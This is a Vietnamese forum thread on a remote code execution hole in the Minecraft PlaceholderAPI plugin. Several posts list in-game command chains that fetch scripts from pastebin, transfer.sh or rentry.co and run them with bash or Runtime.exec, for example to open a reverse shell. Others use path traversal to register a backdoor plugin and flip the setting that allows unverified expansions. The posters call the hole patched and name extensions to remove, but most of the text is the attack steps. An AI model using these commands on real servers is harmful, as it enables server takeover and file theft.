• Chào bạn, hãy đăng ký hoặc đăng nhập để tham gia cùng bọn mình và sử dụng được đầy đủ chức năng của diễn đàn :).
jordu

Thảo luận MC Server Lỗ hổng placeholderapi

jordu

THÀNH VIÊN
Tham gia
14/06/2022
Bài viết
15
40114



hiện tại thì bị patch rồi nên quẩy tiếp đi
 
View attachment 40114


hiện tại thì bị patch rồi nên quẩy tiếp đi
cách thực hiện cái exploit này


1: Griefer sẽ cài expansion này lên nạn nhân [/papi ecloud download javascript] lệnh cho các cháu không biết dùng placeholderapi
2: Nó sẽ sử dụng lệnh /jsexpansion parse me new java.lang.ProcessBuilder("wget", "pastebin.com").start(); [trong cái pastebin có thể là một script vd như: reverse shell,etc...]
3 tiếp theo nó sẽ sử dụng lệnh /jsexpansion parse me new java.lang.ProcessBuilder("bash", "shell").start(); để chạy script

dành cho các cháu muốn lạm dụng cái này để đi leak file thì bỏ đi vì nó bị patch rồi
 
này dc dự đoán trc r, tụi aternos ban plugin này là đúng
 
cách thực hiện cái exploit này


1: Griefer sẽ cài expansion này lên nạn nhân [/papi ecloud download javascript] lệnh cho các cháu không biết dùng placeholderapi
2: Nó sẽ sử dụng lệnh /jsexpansion parse me new java.lang.ProcessBuilder("wget", "pastebin.com").start(); [trong cái pastebin có thể là một script vd như: reverse shell,etc...]
3 tiếp theo nó sẽ sử dụng lệnh /jsexpansion parse me new java.lang.ProcessBuilder("bash", "shell").start(); để chạy script

dành cho các cháu muốn lạm dụng cái này để đi leak file thì bỏ đi vì nó bị patch rồi
bọn Girefer đâu có quyền dùng lệnh đc?
 
bonus: nếu server bạn sử dụng plugin plugmanX hoặc plugmanager,commandpanel thì hãy vào config của nó và tắt cái download đi vì nó cho phép download backdoor plugin

/cpi lmfao.jar transfer.sh
/papi register ../../CommandPanels/panels/lmfao.jar.yml
/papi parse me %rce_curl_-O_rentry.co
/papi parse me %rce_bash_raw%

/plugman download direct rce plugin


và một số extensions nên xoá:

fetch:

/papi ecloud download fetch
/papi reload
/papi parse me %fetch_ test 1 transfer.sh
/papi register ../../../fetch/test
/papi parse me %rce_curl_-O_rentry.co
/papi parse me %rce_bash_raw%

groopi:
/papi ecloud download groopi
/papi reload
/papi parse me %groopi_java.lang.Runtime.getRuntime().exec("curl -O rentry.co")%
/papi parse me %groopi_java.lang.Runtime.getRuntime().exec("bash raw")%

minepacks:
/papi ecloud download minepacks 1.0.6
/papi reload
/papi parse me %minepacks_set ./PlaceholderAPI/config cloud_allow_unverified_expansions true%
/papi parse me %minepacks_set ../PlaceholderAPI/config cloud_allow_unverified_expansions true%
/papi reload
 
Similar content Most view Xem thêm
Back
Top Bottom